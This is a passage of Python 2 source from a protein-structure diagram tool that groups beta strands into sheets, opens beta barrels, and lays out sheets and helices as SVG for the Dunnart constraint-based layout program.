note (node1,node2) and (node2,node1)
are the same (undirected graph) and
only one of the two is present in the
Labels each strand node with the sheet id it belongs to as it goes.
"""
sheet_id = 'A' # sheet id is single alpha char A, B, etc.
# (will be a problem for more than 26 sheets... eg
# this actually happens on 2J28), wrap to lowercase
visited = {} # dictionary of {ptnode : True} visited nodes
back_edge_list = [] # list of (ptnode, ptnode) tuples for back edges
self.sheet_dict = {} # dictionary of {sheet_id : nodelist}
self.sheet_backedges_dict = {} # dict of {sheet_id : ((node1,node2))}
# listing 'back edges' i.e. edges
# to an ancestor in DFS spanning tree
# in the connected component (sheet).
# note (node1,node2) and (node2,node1)
# are the same (undirected graph) and
# only one of the two is present in the
# list.
for node in self.iter_strands():
if node not in visited:
connected_node_list = []
back_edge_list = []
self.dfs_strands(node, visited, connected_node_list, None,
back_edge_list,
sheet_id)
self.sheet_dict[sheet_id] = list(connected_node_list)
self.sheet_backedges_dict[sheet_id] = list(back_edge_list)
sheet_id = chr(ord(sheet_id)+1)
if sheet_id == '[':
sheet_id = 'a' # if go past Z, wrap to lowercase
def label_sheets(self):
"""
Label strands with sheet id to which each belongs by finding
connected components; strands in a connected component of
the graph (considering only STRAND nodes and bridge edges)
form a sheet.
Parameters: None
Uses member data:
node_list - list of nodes. Modifies nodes by labelling them.
Return value:
Returns the sheet dictionary (dictionary of
{ sheet_id : ptnode_list }) from find_connected_components.
"""
# Actually don't do anything except call find_connected_components()
# which does the labeling itself (more efficient since it knows
# as each one is added which sheet it is added to)
return self.find_connected_components()
def label_bridge_sides(self):
"""
Label bridge edges with '+' or '-' indicating relative side of
the strand the bridge partners are on. This method just calls
label_strand_bridge_sides() (PTNodeStrand method, see documentation
there for details) for each strand to do this.
Parameters: None
Uses member data:
chain_dict - dict by chainid of
list of nodes in the graph. Not itself modified,
but edges in the PTNodeStrands (i.e. bridge_list)
in those is modified by label_strand_bridge_sides()
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
Return value: None
"""
for node in self.iter_strands():
node.label_strand_bridge_sides(self.pdb_struct)
def build_constraints(self):
"""
Build constraints for all sheets. The constraints consist of strands
in a sheet being in a cluster, and strand ordering constraints
for each sheet computed by build_sheet_constraints()
The idea is that these constraints can then be used as input
to a constraint-based graph layout system (Dunnart - see
write_dunnart_svg()).
Return value: None; member data sheet_strandlists_dict is built.
Uses data members:
sheet_dict - the sheet dictionary (dictionary of
{ sheet_id : ptnode_list }) from
find_connected_components.
sheet_strandlists_dict (WRITE) -
dictionary of { sheet_id : list of list of nodes }
where the list of list of nodes is
described in build_sheet_constraints()
ptrelpos (WRITE) -
PTRelativePosition instance created to find relative
positions of elements later, using dist matrix
and sheet strand lists.
pdb_struct, distmatrix, tableau - passed to PTRelativePosition which
keeps a pointer to them itself.
"""
# label bridge edges + or - for relative sides of strand, as per
# Westhead et al 1999.
self.label_bridge_sides()
# now that all bridge sides are labelled, process each sheet
self.sheet_strandlists_dict = {}
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
self.sheet_strandlists_dict[sheet_id] = \
self.build_sheet_constraints(ptnode_list)
self.ptrelpos = PTRelativePosition(self.pdb_struct,
self.distmatrix,
self.sheet_strandlists_dict,
self.tableau,
self.chain_dict,
self.sheet_dict)
def build_sheet_constraints(self, ptnode_list):
"""
Build constraints, for a single sheet,
on the layout of the strand nodes based on their
sheet membership (determined by label_sheets(), which must
be called before this subroutine, and the return value from it
passed to this one).
These constraints specify that strands in a sheet are positioned
in order along a (horizontal) line. Bifurcations
in the sheet also need to be taken into account.
Strands are ordered according to their neighbour (bridge partner)
relationships, and a bifurcation results in having two (or more,
conceivably) strands both neighbours on the same side of one strand.
These can then have further neighbours of their own, independently.
In addition to the data structure returned by this subroutine
defining constraints, the strand nodes themselves are annotated
with further information, such as the orientation (up or down)
of the arrow to be drawn (based on the parallel/antiparallel
relationships between adjacent strands as previously labelled
by label_bridge_sides()), and the vertical position relative to the
neighbouring strand, determined by the positions (residues) on the
strands where the H-bonds forming the beta-bridges are located.
Parameters:
ptnode_list - list of PTNodeStrand elements for the sheet.
Return value:
list of list of PTNodeStrand.
Each element in that list is itself a list of
strands. The outermost list is for horizontal (left to right)
position in the layout. The list of nodes at a given position
in that outermost list is a list of nodes at the same
horizontal position, and each is labelled with a relative
vertical position for the layout.
This is similar to what is done in TOPS
as per Westhead et al 1999 (see Fig 5B, p. 902).
Uses data members (readonly):
sheet_backedges_dict - dict of { sheet_id : (node1, node2) }
of back edges from DFS in connected
component (sheet)
Note: also set properties in PTNodeStrand objects (reversed, align_pos)
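Example of the return value shape (hypothetical four-strand sheet
with one bifurcation): [[s1], [s2], [s3, s4]] means s1, s2 and the
s3/s4 pair are placed left to right, while s3 and s4 share the same
horizontal position because both are neighbours on the same side
of s2.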
"""
# note number of undirected edges is 1/2 number of bridge edges
# in our connected component as we have one for each direction.
num_dir_edges= sum([ node.num_neighbours() for node in ptnode_list])
assert(num_dir_edges % 2 == 0)
num_edges = num_dir_edges / 2
# because a sheet (by definition of the way we have found it)
# is a connected component, if |E| = |V| - 1 it is acyclic;
# otherwise it must be cyclic, and in fact:
num_cycles = num_edges - len(ptnode_list) + 1
assert(num_cycles >= 0)
#------ debug output
if verbose:
sys.stderr.write('num nodes = ' + str(len(ptnode_list)) + '\n')
sys.stderr.write('num edges = ' + str(num_edges) + '\n')
sys.stderr.write('hence num cycles = ' +str(num_cycles) + '\n')
#------ end
if len(ptnode_list) < 2:
sys.stderr.write(
'WARNING: sheet has fewer than 2 strands (' +
str(ptnode_list[0]) + ') \n')
return [ptnode_list]
# now that we have the bridge edges labelled with relative sides,
# we can (for each sheet) use a DFS, starting at a leaf node
# (one with only one neighbour) to get the positioning of strands
# as per Westhead et al 1999 (see Fig 5, p. 902).
open_node1 = open_node2 = None
if num_cycles > 0:
# for a connected component, the number of back edges must be
# equal to the number of edges - number of nodes + 1
# (= number of (basic) cycles)
sheet_id = ptnode_list[0].get_sheet_id()
assert(num_cycles == len(self.sheet_backedges_dict[sheet_id]))
# There is at least one cycle (beta barrel) so we won't be able to
# find a strand with only one neighbour.
# We will 'open' the barrel into a sheet.
# At the moment we will 'break' a bridge arbitrarily
# (by removing each 'back edge' found in the DFS to break
# each fundamental (aka basic or basis) cycle).
# This is consistent and guaranteed to break the cycle but
# it is rather arbitrary from a physical/chemical/biological
# point of view.
# TODO: maybe should have some more physically relevant
# criteria for choosing which
# bridge to break e.g. Hutchinson and Thornton 1990 (HERA)
# open at position which minimizes number of H-bonds broken.
sys.stdout.write("detected " + str(num_cycles) +
" beta barrel(s)\n")
for (open_node1, open_node2) in self.sheet_backedges_dict[sheet_id]:
sys.stdout.write("opened barrel by removing bridge from " +
open_node1.nodeid + " to " +
open_node2.nodeid +"\n")
open_node1.set_barrel_edge(True)
open_node2.set_barrel_edge(True)
open_node1.remove_bridge(open_node2)
# get node to start at (a node with only one neighbour)
# If a barrel was broken, start at the node where the bridge was
# removed, if that node has only one neighbour (otherwise use
# the first node we find that has only one neighbour)
if open_node1 != None and open_node1.num_neighbours() == 1:
start_node = open_node1
elif open_node2 != None and open_node2.num_neighbours() == 1:
start_node = open_node2
else:
start_node = None
for node in ptnode_list:
if node.num_neighbours() == 1:
start_node = node
break
assert(start_node.num_neighbours() == 1)
dfs_list = []
dfs_strands_from(start_node, {}, dfs_list, None) # in ptnode.py
#------ debug output
if verbose:
for (node, from_node) in list(dfs_list):
if from_node == None:
fm_nodeid = '<none>'
else:
fm_nodeid = from_node.nodeid
sys.stderr.write(node.nodeid+" from "+ fm_nodeid+", ")
sys.stderr.write('\n')
#------ end
nodelist = list(dfs_list) # nodelist is in DFS order
horiz_order_list = []
for i in range(len(nodelist)): # may be longer than needed
horiz_order_list.append([])
node_index_dict = {} # dictionary of { nodeid : horiz_order_list_index }
firstnode = nodelist[0][0]
firstnode.set_reversed(False)
firstnode.set_align_pos(0)
horiz_order_list[0] = [firstnode]
node_index_dict[firstnode.nodeid] = 0
prev_index = 0
prev_side = None
prev_node = None
for node_index in range(1, len(nodelist)):
(node, from_node) = nodelist[node_index]
# put node in correct position in outer list according
# to constraints on side of node it was reached from
# relative to other node adjacent to that node
found_constraint = False
fromnode_index = node_index_dict[from_node.nodeid]
cur_side = from_node.get_side_of_neighbouring_strand(node)
if cur_side != '.': # side constraints are '+' or '-'; '.' means none
prev_side = None
for (prev_node,bdir_unused,side) in from_node.get_bridge_list():
if prev_node != node:
prev_index = None
for k in range(fromnode_index + 2): #upto AFTER fromnode
if prev_node in horiz_order_list[k]:
prev_index = k
prev_side = side
if prev_side != '.': # found a constraint
found_constraint = True
break
if found_constraint:
break
if found_constraint:
if cur_side == prev_side:
horiz_order_list_index = prev_index
else:
if prev_index < fromnode_index:
horiz_order_list_index = fromnode_index + 1
else:
horiz_order_list_index = fromnode_index - 1
else:
horiz_order_list_index = fromnode_index + 1
node_index_dict[node.nodeid] = horiz_order_list_index
vert_list = horiz_order_list[horiz_order_list_index]
vert_list.append(node)
# set reversed flag depending on parallel/antiparallel relationship
if node.is_parallel(from_node):
node.set_reversed(from_node.get_reversed())
else:
node.set_reversed(not from_node.get_reversed()) # antiparallel
# set relative vertical positions of strands based on H bonds
compute_align_positions(node, from_node)
# since outer list may have been longer than needed, remove empty lists
for i in range(len(horiz_order_list)-1, -1, -1):
if horiz_order_list[i] == []:
horiz_order_list.pop(i)
#------ debug output
if verbose:
for vert_list in horiz_order_list:
for node in vert_list:
dirstr = "up"
if node.get_reversed():
dirstr = "down"
sys.stderr.write(node.nodeid + '(' + dirstr + ' ' +
str(node.get_align_pos()) + ') ')
sys.stderr.write('\n')
#------ end
return horiz_order_list
def sheet_size(self, sheet_id):
"""
Calculate the 'size' of a sheet, which is defined as the number
of residues in the sheet, i.e. the sum of the number of residues
in each strand of the sheet.
Parameters:
sheet_id - id of the sheet to find size of
Uses member data:
sheet_dict - dict of {sheet_id : ptnode_list} representing sheets
Return value:
Number of residues in the sheet (sum of number of residues in
each strand of the sheet)
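Example (hypothetical sketch): a sheet whose three strands span 5, 7
and 4 residues respectively gives sheet_size(sheet_id) == 16.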
"""
return sum([strand.get_span() for strand in self.sheet_dict[sheet_id]])
def largest_sheet(self):
"""
Return the id of the 'largest' sheet in the sheet_dict, where
size of a sheet is as defined by the sheet_size() function.
Parameters: None.
Uses member data:
sheet_dict - dict of {sheet_id : ptnode_list} representing sheets
Return value:
sheet id of the largest sheet, or None
"""
max_size = 0
max_size_sheet_id = None
for sheet_id in self.sheet_dict.iterkeys():
size = self.sheet_size(sheet_id)
if size > max_size:
max_size = size
max_size_sheet_id = sheet_id
return max_size_sheet_id
def get_orientation_sse(self):
"""
Return the SSE (strand or helix) to be used for relative orientation
of this whole PTgraph2 (domain/protein). This is the longest
strand of the largest sheet (NB not longest strand overall), or
longest helix if there is no sheet.
Parameters:
None
Return value:
PTNode which is either a PTNodeStrand or PTNodeHelix, as described
above.
Uses data members (Readonly):
sheet_dict, nodelist, ptrelpos, sheet_strandlists_dict
"""
sheet_id = self.largest_sheet()
if sheet_id != None:
(sse, length) = self.ptrelpos.get_longest_strand(
self.sheet_strandlists_dict[sheet_id])
else:
sse = self.largest_helix()
return sse
def write_sheet_mfiles(self, pdbid, domainid):
"""
Write a MATLAB m-file for each sheet. The m-file contains
commands to plot in 3D the carbon-alpha trace of each strand
and the axis fitted to it.
Note we can't use the same convention as our .ps and .svg filenames
since MATLAB can't have '-' characters in m-file filenames,
or digits as the first character (since m-files are used as commands).
So we will have filenames that always have the domain identifier
(even if single domain), and will add the sheet id on the end,
and an M on the front
e.g. 'M1QLP1A.m' (1QLP domain 1 sheet A).
Then you can run 'matlab -r M1QLP1A' to plot it
(or just enter M1QLP1A at the MATLAB prompt).
Parameters:
pdbid - PDB identifier
domainid - domain identifier
Return value: None
Uses member data: (readonly)
nodelist - list of nodes; NOTE however that as the fit_axis()
method is called this will compute axes and store
in PTNodeStrand nodes - when not writing m-files
only axes are computed as needed, this forces them
all to be computed.
secstruct - PTSecStruct representing the secondary structure
sheet_dict - dict of {sheet_id : ptnode_list} representing sheets
WARNING: overwrites the output files
"""
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
filename = 'M' + pdbid + domainid + sheet_id + '.m'
sys.stdout.write('writing file ' + filename + '\n')
fh = open(filename, 'w')
mfile_write_prelude(fh)
for node in ptnode_list:
node.fit_axis(self.pdb_struct, fh) # writes to fh itself
mfile_write_conclusion(fh)
fh.close()
def write_helix_mfiles(self, pdbid, domainid):
"""
Write a (single) MATLAB m-file for all helices. The m-file contains
commands to plot in 3D the carbon-alpha trace of each helix
and the axis fitted to it.
Note we can't use the same convention as our .ps and .svg filenames
since MATLAB can't have '-' characters in m-file filenames,
or digits as the first character (since m-files are used as commands).
So we will have filenames that always have the domain identifier
(even if single domain), and will add the sheet id on the end,
and an MH on the front
e.g. 'MH1QLP1.m' (1QLP domain 1).
Then you can run 'matlab -r MH1QLP1' to plot it
(or just enter MH1QLP1 at the MATLAB prompt).
Parameters:
pdbid - PDB identifier
domainid - domain identifier
Return value: None
Uses member data: (readonly)
nodelist - list of nodes; NOTE however that as the fit_axis()
method is called this will compute axes and store
in PTNodeHelix nodes - when not writing m-files
only axes are computed as needed, this forces them
all to be computed.
secstruct - PTSecStruct representing the secondary structure
WARNING: overwrites the output files
"""
filename = 'MH' + pdbid + domainid + '.m'
sys.stdout.write('writing file ' + filename + '\n')
fh = open(filename, 'w')
mfile_write_prelude(fh)
for node in self.iter_helices():
node.fit_axis(self.pdb_struct, fh) # writes to fh itself
mfile_write_conclusion(fh)
fh.close()
def build_dunnart_svg(self,
sse_label_scheme = 'separate',
use_connector_arrowheads=False,
heuristic_helix_placement=False,
sheet_shading_colors = None,
enable_sheet_gap_rule = False,
use_helix_clustering = False,
helix_cluster_shading_color = None,
connector_color_scheme = 'all',
color_scheme = 'none',
helix_proximity_shading_colors = None,
initial_xmlid = 1,
main_sideways = False,
main_reversed = False,
interdomain_connectors = False,
label_residue_numbers = False):
"""
Build SVG for input to the Dunnart interactive constraint-based
layout diagramming program.
http://www.csse.monash.edu.au/~mwybrow/dunnart/
Dunnart (0.14+SVN) has been modified to work with this by including
strand and helix shapes, amongst other things (by Michael Wybrow).
(Currently not generally available).
The greedy algorithm for laying out the cartoon is basically:
1. Place the largest element somewhere near the middle of canvas
2. Use the distance map to find closest element to any already
placed element
3. position that closest element relative to the chosen already
placed one, using distance/position maps and tableaux to determine
relative position and orientation
4. repeat from 2 until all elements placed
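A hedged Python-flavoured sketch of steps 2-4 (illustrative only;
the actual loop below works on sheet ids and PTNodeHelix objects):
while unpositioned:
(ref, cur) = self.find_nearest_to_any_in_set(positioned, excluded)
(relpos, rs, cs) = self.ptrelpos.get_relative_position(ref, cur)
(xpos, ypos) = self.relpos_to_pos(ref, cur, relpos, rs, cs,
sheet_pos_dict)
# then build the SVG shape(s) for cur at (xpos, ypos)
unpositioned.remove(cur); positioned.add(cur)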
Sheets are single elements in themselves, with the relative positioning
and layout of their strands performed by build_sheet_svg() based
on the constraints already built in build_sheet_constraints().
Parameters:
sse_label_scheme - 'none', 'sequential' or 'separate'.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
use_connector_arrowheads - If true put arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Default False.
heuristic_helix_placement - instead of using the greedy algorithm
with distance matrix information for helices,
use the old heuristic algorithm to place them
aligned neatly with strands nearby in sequence.
Still use greedy distance matrix algorithm for sheets.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
enable_sheet_gap_rule - If True and using heuristic helix
placement, don't put 'too long' helices between
neighbouring sheets.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
connector_color_scheme - 'all','chain','domain','crossing' (see main)
color_scheme: 'none', 'simple', 'gradient', 'sheet', 'fold'
(specified in main)
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
initial_xmlid - Initial XML sequential identifier. Default 1.
main_sideways - if True, the 'main' part of the domain (largest sheet
or longest helix) is drawn sideways instead of vertical
main_reversed - If True, the main part (as above) is drawn reversed
(down not up, or right not left when sideways)
interdomain_connectors - If True, do NOT make pseudo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left to have connectors to the other domain
added later. Default False.
label_residue_numbers - If True put start and end residue numbers
of SSE on head and tail of shape as labels
Return value: None
Uses member data: (readonly)
secstruct - PTSecStruct representing the secondary structure
sheet_strandlists_dict - the dictionary (by sheet id)
of list of lists built by
build_constraints()
ptrelpos -
PTRelativePosition instance to find relative positions
include_pi_helices, include_310_helices
pdb_struct - need to get residue name/id information for connectors
(read/write):
sheet_cluster_list - list of SVGCluster objects for sheets
helix_cluster_list - list of SVGCluster objects for helix clusters
svg_constraint_list - list of PTSVGConstraint derived objects
svg_connector_list - list of PTSVGConnector objects
Note also uses member data in each node.
NOTE: The output file is overwritten if it exists.
Precondition: node_list is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
# everything in the SVG will have a unique id, sequentially
self.xmlid_generator = GenSeqId(initial_xmlid)
# if using sequential numbering, we'll build this dictionary mapping
# nodeid to sequential number (note NOT restarting for each chain)
# since we will not be
# iterating through node_lists when writing the SVG, so will need
# to look up the ordinal position (sequence number) for a node.
# this is a dictionary of { nodeid : seqnum }
seqnum_dict = {}
for (seqnum, nodeid) in \
enumerate([node.nodeid for node in self.iter_nodes() if \
not ( (isinstance(node, PTNodeTerminus)) or
(isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ) ) ]):
seqnum_dict[nodeid] = seqnum + 1 # start at 1 not 0
init_xpos = 300 # initial x position
init_ypos = 200 # initial y position
xpos = init_xpos
ypos = init_ypos
self.sheet_cluster_list = [] # list of PTSVGCluster objects for sheets
self.helix_cluster_list = [] # list of PTSVGCluster for helix clusters
self.helix_cluster_dict = {} # dict { clusterid : PTSVGCluster }
self.svg_constraint_list = [] # list of PTSVGConstraint objects
self.svg_connector_list = [] # list of PTSVGConnector objects
# store y pos of sheet top and bottom
# and x pos of sheet left and right in a dictionary
# { sheet_id : (top_ypos, bottom_ypos, left_xpos, right_xpos) }
# e.g. { 'A' : (100, 120, 30, 200) }
# (note y before x for historical reasons, started with only ypos
# then extended it)
# so we can position things
# relative to them later
# TODO: should probably have a class to represent sheets with these
# values as data members rather than this dict
sheet_pos_dict = {}
# stores above,below,left,right neighbour sheet of each sheet
# TODO: maybe we should use this to avoid collisions between
# helices and helix clusters and sheets (not just between
# sheets as we do currently)
# instead of depending on Dunnart
# non-overlap constraints to fix it up when this happens?
# (Since greedy algorithm can result in elements being placed
# on top of each other).
sheet_posmap = PTPosMap()
num_sheets = len(self.sheet_dict)
num_helices = self.get_num_helices()
# We'll make two sets: one for all the elements (sheets, helices)
# not yet positioned, and one for those that have been positioned.
# members of these sets are either PTNodeHelix for a helix or
# sheet id ('A' etc.) for a sheet.
# We also need a third set of elements to exclude from placement,
# namely 310 and/or pi helices if we don't want to draw them.
# (These will not be in unpositioned_elements (handled by iter_helices())
# but we need a set to explicitly tell find_nearest_to_any_in_set()
# to not return them).
positioned_elements = Set()
exclude_elements = Set()
if heuristic_helix_placement:
# only position sheets, helices placed later
unpositioned_elements = Set(list(self.sheet_dict.keys()))
else:
unpositioned_elements = Set(list(self.iter_helices()) +
list(self.sheet_dict.keys()))
for node in self.iter_nodes():
if ( isinstance(node, PTNodeHelix) and
((node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
exclude_elements.add(node.nodeid) #note: nodeid not node
total_elements = len(unpositioned_elements)
# get the largest element, to place first. It will be a sheet,
# and if no sheets (alpha-only domain), the largest helix
largest_sheet_id = self.largest_sheet()
if largest_sheet_id != None:
if main_sideways:
if verbose:
sys.stderr.write('largest sheet ' + largest_sheet_id +
' is sideways\n')
self.ptrelpos.set_all_sheet_strands_sideways(largest_sheet_id)
if main_reversed:
if verbose:
sys.stderr.write('largest sheet ' + largest_sheet_id +
' is reversed\n')
self.ptrelpos.flip_all_strands_in_sheet(largest_sheet_id)
self.build_sheet_svg(sheet_pos_dict,
sse_label_scheme, seqnum_dict,
largest_sheet_id,
xpos, ypos, label_residue_numbers)
unpositioned_elements.remove(largest_sheet_id)
positioned_elements.add(largest_sheet_id)
elif not heuristic_helix_placement:
# no sheets, place largest helix first
helix = self.largest_helix()
helix.set_sideways(main_sideways)
helix.set_reversed(main_reversed)
self.set_helix_svginfo(helix, xpos, ypos,
sse_label_scheme, seqnum_dict,
label_residue_numbers)
unpositioned_elements.remove(helix)
positioned_elements.add(helix)
while len(unpositioned_elements) > 0:
assert(len(unpositioned_elements) +
len(positioned_elements) == total_elements)
assert(len(unpositioned_elements & positioned_elements) == 0)
# find nearest element to any already positioned element
(positioned_element, cur_element) = \
self.find_nearest_to_any_in_set(positioned_elements,
exclude_elements,
heuristic_helix_placement)
if verbose:
sys.stderr.write('positioning ' + str(cur_element) +
' relative to ' +
str(positioned_element) + '\n')
# position the element near its closest already positioned one
# according to position map for relative position and tableau
# for orientation
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(positioned_element,
cur_element)
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
if isinstance(cur_element, PTNodeHelix):
self.set_helix_svginfo(cur_element,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
else:
if not isinstance(positioned_element, PTNodeHelix):
# positioned element is a sheet. Avoid collisions with
# already placed sheets by checking in posmap and
# positioning relative to the thing we would have collided
# with instead.
if sheet_posmap.has_key(positioned_element):
sheet_neighbours = sheet_posmap[positioned_element]
neighbour = sheet_neighbours.get_neighbour(relpos)
if neighbour != None:
if verbose:
sys.stderr.write(" sheet positioning: "
"can't place " +
cur_element + ' ' +
ptrelpos_to_str(relpos) + ' ' +
'sheet ' + positioned_element +
' (occupied by ' +
neighbour +
')\n')
positioned_element = neighbour
if verbose:
sys.stderr.write(' positioning ' +
str(cur_element) +
' relative to ' +
str(positioned_element) +
' instead\n')
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(positioned_element,
cur_element)
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
sheet_neighbours = sheet_posmap[positioned_element]
neighbour = sheet_neighbours.get_neighbour(relpos)
if neighbour != None:
# note there is cut&paste code
# here from further up (before if isinstance...)
# And sometimes (e.g. 2QP2-1, the case this is
# intended originally to fix), we get a collision
# on the new positioned_element as well.
# So we could then use an arbitrary position
# (but what if none?) Don't want a lot of
# cut&paste trying.. maybe should loop from
# closest to furthest SSEs from the test element
# and place in relpos to one where the relpos
# neighbour slot is vacant.
# FIXME: arbitrary sheet positioning here
if (sheet_neighbours.west == None):
relpos = RELPOS_LEFT
elif (sheet_neighbours.east == None):
relpos = RELPOS_RIGHT
elif (sheet_neighbours.north == None):
relpos = RELPOS_ABOVE
elif (sheet_neighbours.south == None):
relpos = RELPOS_BELOW
else:
sys.stderr.write('WARNING: nowhere to place ' +
cur_element +
' relative to sheet '
+ positioned_element +
'\n')
if verbose:
sys.stderr.write(' (collision): ' +
'positioning sheet ' +
cur_element + ' ' +
ptrelpos_to_str(relpos) +
' sheet ' +
positioned_element +
'\n')
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
sheet_posmap.add_neighbour_obj(positioned_element, cur_element,
relpos)
self.build_sheet_svg(sheet_pos_dict,
sse_label_scheme, seqnum_dict,
cur_element,
xpos, ypos, label_residue_numbers)
# for strands that are both vert or both horiz and used as
# closest elements in sheets, constrain them to be aligned
# on their indguides, if they are above/below when vert
# or left/right when horiz.
# NOTE for -i option (helix placement using
# dist matrix) pos_strand may actually be a helix,
# so won't have an indguide). TODO: align on helix?
if ( isinstance(pos_strand, PTNodeStrand) and
cur_strand.get_sideways() == pos_strand.get_sideways() and
((not cur_strand.get_sideways() and
(relpos == RELPOS_ABOVE or relpos == RELPOS_BELOW)) or
(cur_strand.get_sideways() and
(relpos == RELPOS_LEFT or relpos == RELPOS_RIGHT))) ):
assert(pos_strand.indguide != None)
if cur_strand.get_sideways():
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(pos_strand.indguide,
cur_strand,
align_type))
unpositioned_elements.remove(cur_element)
positioned_elements.add(cur_element)
# END of iteration over unpositioned_elements set
assert(len(positioned_elements) == total_elements)
if heuristic_helix_placement:
# first position any helices that meet the special case of
# being between two strands on same axis (i.e. in vertlist)
# in sheet
self.build_interstrand_helices_svg(sheet_pos_dict,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
# now position all other helices on axis of nearby strand,
# or elsewhere according to heuristics
self.build_helices_svg(sheet_pos_dict,
sse_label_scheme, seqnum_dict,
sheet_posmap, enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers)
if use_helix_clustering:
# if using helix clustering, color nearby helix clusters
# the same shading color. Note that this may involve
# making some helices a one-helix 'cluster'.
if helix_proximity_shading_colors:
self.set_helix_cluster_colors(helix_proximity_shading_colors,
helix_cluster_shading_color)
# color the helices in clusters according to the color
# list if such is specified using 'simple' color scheme
if color_scheme[:6] == 'simple':
type_color_dict = get_simple_colors(color_scheme)
if type_color_dict.has_key('helixcluster'):
helixcluster_color_list = type_color_dict['helixcluster']
else:
helixcluster_color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
helix_cluster_i = 0
for helix_cluster in self.helix_cluster_list:
for helix in helix_cluster.svgnodelist:
helix.set_color_hex(helixcluster_color_list[
helix_cluster_i % len(helixcluster_color_list)])
helix_cluster_i += 1
# and build all the connectors
chain_i = 0
for nodelist in self.iter_chains():
self.build_connectors_aligned_svg(nodelist,
chain_i,
use_connector_arrowheads,
connector_color_scheme,
interdomain_connectors)
chain_i += 1
else:
# build termini
self.build_termini_svg(interdomain_connectors)
# build connectors
chain_i = 0
for nodelist in self.iter_chains():
self.build_connectors_svg(
nodelist,
chain_i,
use_connector_arrowheads,
connector_color_scheme,
interdomain_connectors)
chain_i += 1
# build lists of residue names and ids in connectors
for connector in self.svg_connector_list:
connector.build_resname_sequence(self.residue_list,
self.pdb_resid_dict)
# build sheet clusters
self.build_sheet_cluster_constraints_svg(sheet_shading_colors)
def relpos_to_pos(self, reference_element, new_element, relpos,
ref_strand, new_strand,
sheet_pos_dict):
"""
Given a reference element and an element to place, and its position
relative to the reference element, return the absolute x and y
co-orindates to place the new element. Uses the information from
the nodes and the sheet_pos_dict to find the x and y
co-ordinates of the reference element
Parameters:
reference_element - sheet id or PTNodeHelix of the element
used as reference
new_element - sheet id or PTNodeHelix of element to place
relpos - position to place new_element relative to
reference_element. ptrelpos.RELPOS_ABOVE, etc.
ref_strand - strand in reference element it is relative to
or None if not a sheet
new_strand - strand in new element used for relative
position or None if not a sheet
{ nodeid : (shape_xmlid, xpos, ypos, indguide_xmlid) }
sheet_pos_dict - y pos of sheet top and bottom
and x pos of sheet left and right
{ sheet_id : (top_y, bot_y, left_x, right_x) }
Uses data members:
sheet_strandlists_dict -
dictionary of { sheet_id : list of list of nodes }
where the list of list of nodes is
described in build_sheet_constraints()
ptrelpos -
PTRelativePosition instance to find relative
positions of elements
Return value:
tuple (xpos, ypos) of position to place new_element
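Example (hypothetical sketch): placing a helix RELPOS_BELOW a
reference helix typically returns
(reference_element.xpos, bot_y + get_min_gap_size())
where bot_y is the bottom y co-ordinate of the reference helix.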
"""
if isinstance(reference_element, PTNodeHelix):
left_x = reference_element.xpos
right_x = left_x
if reference_element.get_sideways():
right_x += reference_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
right_x += DUNNART_HELIX_WIDTH
top_y = reference_element.ypos
if reference_element.get_sideways():
bot_y = top_y + DUNNART_HELIX_WIDTH
else:
bot_y = top_y + (reference_element.get_span() *
DUNNART_HELIX_SPAN_FACTOR)
else:
# is a sheet id
assert(isinstance(ref_strand, PTNodeStrand))
left_x = sheet_pos_dict[reference_element][2]
right_x = sheet_pos_dict[reference_element][3]
top_y = sheet_pos_dict[reference_element][0]
bot_y = sheet_pos_dict[reference_element][1]
if relpos == RELPOS_ABOVE or relpos == RELPOS_BELOW:
if isinstance(new_element, PTNodeHelix):
assert(new_strand == None)
if ref_strand != None: # position helix relative to sheet
xpos = ref_strand.xpos
if relpos == RELPOS_ABOVE:
if not (ref_strand.get_sideways() or
new_element.get_sideways()):
ypos = top_y - get_min_gap_size() - \
new_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
ypos = top_y - get_min_gap_size()
else:
ypos = bot_y + get_min_gap_size()
else: # position helix relative to helix
xpos = left_x
if relpos == RELPOS_ABOVE:
if (not reference_element.get_sideways() or
new_element.get_sideways()):
ypos = top_y - get_min_gap_size() - \
new_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
ypos = top_y - get_min_gap_size()
else:
ypos = bot_y + get_min_gap_size()
else:
# new element is a sheet
assert(new_strand != None)
new_strand_posnum = \
self.ptrelpos.get_strand_posnum(new_strand)
if (ref_strand != None and
isinstance(ref_strand, PTNodeStrand)):
# position sheet relative to sheet
# need to align ref_strand and new_strand on vert axis
# so xpos (which is pos of leftmost strand in sheet)
# is difference between dist of ref strand from leftmost
